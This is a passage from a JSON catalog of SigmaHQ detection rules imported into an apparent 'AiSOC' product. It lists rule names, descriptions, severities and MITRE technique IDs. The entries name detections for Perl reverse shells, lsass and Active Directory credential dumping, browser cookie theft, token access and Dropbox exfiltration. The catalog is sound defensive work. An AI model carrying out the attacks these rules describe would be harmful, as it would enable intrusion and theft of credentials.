"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_smadhook.yml" } }, { "id": "sigmahq-sigma-24c77512-782b-448a-8950-eddb0785fc71", "type": "detection", "name": "SQLite Chromium Profile Data DB Access", "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1539", "T1555.003", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sqlite-chromium-profile-data-db-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24c77512-782b-448a-8950-eddb0785fc71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml" } }, { "id": "sigmahq-sigma-24c8392b-aa3c-46b7-a545-43f71657fe98", "type": "detection", "name": "Suspicious Schtasks Schedule Types", "description": "Detects scheduled task creations or modification on a suspicious schedule type", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-schtasks-schedule-types.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml" } }, { "id": "sigmahq-sigma-24de4f3b-804c-4165-b442-5a06a2302c7e", "type": "detection", "name": "Arbitrary Shell Command Execution Via Settingcontent-Ms", "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-shell-command-execution-via-settingcontent-ms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24de4f3b-804c-4165-b442-5a06a2302c7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" } }, { "id": "sigmahq-sigma-24e3e58a-646b-4b50-adef-02ef935b9fc8", "type": "detection", "name": "Hacktool Execution - Imphash", "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1588.002", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-execution-imphash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml" } }, { "id": "sigmahq-sigma-252902e3-5830-4cf6-bf21-c22083dfd5cf", "type": "detection", "name": "Possible Impacket SecretDump Remote Activity", "description": "Detect AD credential dumping using impacket secretdump HKTL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-impacket-secretdump-remote-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_impacket_secretdump.yml" } }, { "id": "sigmahq-sigma-25676e10-2121-446e-80a4-71ff8506af47", "type": "detection", "name": "Exchange PowerShell Snap-Ins Usage", "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exchange-powershell-snap-ins-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25676e10-2121-446e-80a4-71ff8506af47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" } }, { "id": "sigmahq-sigma-2569ed8c-1147-498a-9b8c-2ad3656b10ed", "type": "detection", "name": "Potential Renamed Rundll32 Execution", "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-renamed-rundll32-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" } }, { "id": "sigmahq-sigma-258b6593-215d-4a26-a141-c8e31c1299a6", "type": "detection", "name": "Anomalous User Activity", "description": "Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anomalous-user-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "258b6593-215d-4a26-a141-c8e31c1299a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml" } }, { "id": "sigmahq-sigma-258fc8ce-8352-443a-9120-8a11e4857fa5", "type": "detection", "name": "Potential Arbitrary Command Execution Using Msdt.EXE", "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-command-execution-using-msdt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml" } }, { "id": "sigmahq-sigma-259a9cdf-c4dd-4fa2-b243-2269e5ab18a2", "type": "detection", "name": "External Remote RDP Logon from Public IP", "description": "Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/external-remote-rdp-logon-from-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml" } }, { "id": "sigmahq-sigma-259dda31-b7a3-444f-b7d8-17f96e8a7d0d", "type": "detection", "name": "Potential RjvPlatform.DLL Sideloading From Default Location", "description": "Detects loading of \"RjvPlatform.dll\" by the \"SystemResetPlatform.exe\" binary which can be abused as a method of DLL side loading since the \"$SysReset\" directory isn't created by default.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rjvplatform-dll-sideloading-from-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "259dda31-b7a3-444f-b7d8-17f96e8a7d0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml" } }, { "id": "sigmahq-sigma-259df6bc-003f-4306-9f54-4ff1a08fa38e", "type": "detection", "name": "Potential Perl Reverse Shell Execution", "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-perl-reverse-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "259df6bc-003f-4306-9f54-4ff1a08fa38e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml" } }, { "id": "sigmahq-sigma-259e5a6a-b8d2-4c38-86e2-26c5e651361d", "type": "detection", "name": "PsExec Service File Creation", "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml" } }, { "id": "sigmahq-sigma-25b9c01c-350d-4b95-bed1-836d04a4f324", "type": "detection", "name": "Moriya Rootkit - System", "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/moriya-rootkit-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25b9c01c-350d-4b95-bed1-836d04a4f324", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml" } }, { "id": "sigmahq-sigma-25cb1ba1-8a19-4a23-a198-d252664c8cef", "type": "detection", "name": "AWS EFS Fileshare Modified or Deleted", "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-efs-fileshare-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25cb1ba1-8a19-4a23-a198-d252664c8cef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-25cb259b-bbdc-4b87-98b7-90d7c72f8743", "type": "detection", "name": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted", "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-rolebinding-clusterrolebinding-modified-and-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-25cde13e-8e20-4c29-b949-4e795b76f16f", "type": "detection", "name": "Suspicious Teams Application Related ObjectAcess Event", "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-teams-application-related-objectacess-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" } }, { "id": "sigmahq-sigma-25eabf56-22f0-4915-a1ed-056b8dae0a68", "type": "detection", "name": "Suspicious Dropbox API Usage", "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dropbox-api-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_dropbox_api.yml" } }, { "id": "sigmahq-sigma-25ffa65d-76d8-4da5-a832-3f2b0136e133", "type": "detection", "name": "PUA - Sysinternal Tool Execution - Registry", "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-sysinternal-tool-execution-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml" } }, { "id": "sigmahq-sigma-2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "type": "detection", "name": "Suspicious SYSTEM User Process Creation", "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134", "T1003", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-system-user-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" } }, { "id": "sigmahq-sigma-2625cc59-0634-40d0-821e-cb67382a3dd7", "type": "detection", "name": "Service Reload or Start - Linux", "description": "Detects the start, reload or restart of a service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-reload-or-start-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2625cc59-0634-40d0-821e-cb67382a3dd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_susp_service_reload_or_restart.yml" } }, { "id": "sigmahq-sigma-2632954e-db1c-49cb-9936-67d1ef1d17d2", "type": "detection", "name": "Addition of SID History to Active Directory Object", "description": "An attacker can use the SID history attribute to gain additional privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/addition-of-sid-history-to-active-directory-object.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_add_sid_history.yml" } }, { "id": "sigmahq-sigma-26481afe-db26-4228-b264-25a29fe6efc7", "type": "detection", "name": "Uncommon Service Installation Image Path", "description": "Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-service-installation-image-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26481afe-db26-4228-b264-25a29fe6efc7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml" } }, { "id": "sigmahq-sigma-26488ad0-f9fd-4536-876f-52fea846a2e4", "type": "detection", "name": "HackTool - SharPersist Execution", "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpersist-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml" } }, { "id": "sigmahq-sigma-264982dc-dbad-4dce-b707-1e0d3e0f73d9", "type": "detection", "name": "Renamed NirCmd.EXE Execution", "description": "Detects the execution of a renamed \"NirCmd.exe\" binary based on the PE metadata fields.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-nircmd-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "264982dc-dbad-4dce-b707-1e0d3e0f73d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_nircmd.yml" } }, { "id": "sigmahq-sigma-2650dd1a-eb2a-412d-ac36-83f06c4f2282", "type": "detection", "name": "Detected Windows Software Discovery - PowerShell", "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/detected-windows-software-discovery-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" } }, { "id": "sigmahq-sigma-26b692dc-1722-49b2-b496-a8258aa6371d", "type": "detection", "name": "Clear PowerShell History - PowerShell", "description": "Detects keywords that could indicate clearing PowerShell history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clear-powershell-history-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26b692dc-1722-49b2-b496-a8258aa6371d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" } }, { "id": "sigmahq-sigma-26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "type": "detection", "name": "PUA - Adidnsdump Execution", "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-adidnsdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml" } }, { "id": "sigmahq-sigma-26e7c5e2-6545-481e-b7e6-050143459635", "type": "detection", "name": "CA Policy Removed by Non Approved Actor", "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ca-policy-removed-by-non-approved-actor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "26e7c5e2-6545-481e-b7e6-050143459635", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml" } }, { "id": "sigmahq-sigma-270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "type": "detection", "name": "Tomcat WebServer Logs Deleted", "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tomcat-webserver-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml" } }, { "id": "sigmahq-sigma-2704ab9e-afe2-4854-a3b1-0c0706d03578", "type": "detection", "name": "HackTool - Dumpert Process Dumper Execution", "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-dumpert-process-dumper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "source_commit": "df5c6a6", "license": "DRL-1.1", 